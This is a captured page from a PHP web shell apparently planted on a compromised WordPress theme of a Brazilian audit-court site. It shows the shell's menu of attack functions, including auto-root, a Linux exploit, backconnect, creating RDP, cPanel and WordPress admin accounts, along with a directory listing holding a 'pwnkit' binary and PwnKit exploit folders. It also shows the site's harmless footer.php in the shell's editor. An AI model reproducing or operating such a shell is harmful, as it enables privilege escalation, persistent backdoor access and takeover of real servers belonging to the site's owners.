Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<footer class="site-footer"> <div class="footer-grid"> <!-- Coluna 1: Logo + nome --> <!-- Coluna 1: Logo + nome --> <div> <div class="footer-brand"> <img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/Logo-fundo-escuro.png')); ?>" alt="MPC-MA" style="height:150px; width:auto;"> </div> </div> <!-- Coluna 2: Contato --> <div class="footer-contact"> <?php $endereco = mpcma_opt('mpcma_endereco', 'Av. Carlos Cunha S/Nº Jaracaty. São Luis-MA. CEP: 65076-820'); ?> <?php $telefone = mpcma_opt('mpcma_telefone', '(98) 2016-6000'); ?> <?php $email = mpcma_opt('mpcma_email', 'mpc@tcema.tc.br'); ?> <p><span class="ico"><img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/maplocalization_89142.png')); ?>" style="width:18px;height:18px;filter:brightness(0) invert(1);"></span> <?php echo esc_html($endereco); ?></p> <p><span class="ico"><img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/phone-call-auricular-symbol-in-black_icon-icons.com_56483.png')); ?>" style="width:18px;height:18px;filter:brightness(0) invert(1);"></span> <?php echo esc_html($telefone); ?></p> <p><span class="ico"><img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/mail-black-envelope-symbol_icon-icons.com_56519.png')); ?>" style="width:18px;height:18px;filter:brightness(0) invert(1);"></span> <a href="mailto:<?php echo esc_attr($email); ?>"><?php echo esc_html($email); ?></a></p> </div> <!-- Coluna 3: Links Rápidos --> <div class="footer-links"> <h4>LINKS RÁPIDOS</h4> <?php wp_nav_menu( [ 'theme_location' => 'footer', 'container' => false, 'fallback_cb' => function() { echo '<a href="' . home_url('/') . '">Início</a>'; echo '<a href="' . home_url('/institucional') . '">Institucional</a>'; echo '<a href="' . home_url('/pareceres') . '">Pareceres</a>'; echo '<a href="' . home_url('/atos-normativos') . '">Atos Normativos</a>'; echo '<a href="' . home_url('/noticias') . '">Notícias</a>'; echo '<a href="https://www.tcema.tc.br/transparencia_novo/" target="_blank" rel="noopener">Transparência</a>'; }, ] ); ?> </div> <!-- Coluna 4: Redes Sociais --> <div class="social-icons"> <?php if ( $ig = mpcma_opt('mpcma_instagram','#') ) : ?> <a href="<?php echo esc_url($ig); ?>" target="_blank" rel="noopener" title="Instagram"> <img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/instagram.png')); ?>" alt="Instagram" style="width:18px;height:18px;filter:brightness(0) invert(1);"> </a> <?php endif; ?> <?php if ( $fb = mpcma_opt('mpcma_facebook','#') ) : ?> <a href="<?php echo esc_url($fb); ?>" target="_blank" rel="noopener" title="Facebook"> <img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/facebook.png')); ?>" alt="Facebook" style="width:18px;height:18px;filter:brightness(0) invert(1);"> </a> <?php endif; ?> <?php if ( $yt = mpcma_opt('mpcma_youtube','#') ) : ?> <a href="<?php echo esc_url($yt); ?>" target="_blank" rel="noopener" title="YouTube"> <img src="<?php echo esc_url(home_url('/wp-content/uploads/2026/06/youtube.png')); ?>" alt="YouTube" style="width:18px;height:18px;filter:brightness(0) invert(1);"> </a> <?php endif; ?> </div> </div> <div class="footer-bottom"> © <?php echo date('Y'); ?> Tribunal de Contas do Estado do Maranhão. All Rights Reserved. Powered by Gerência de Tecnologia da Informação - GETEC </div> </footer> <?php wp_footer(); ?> </body> </html>
Close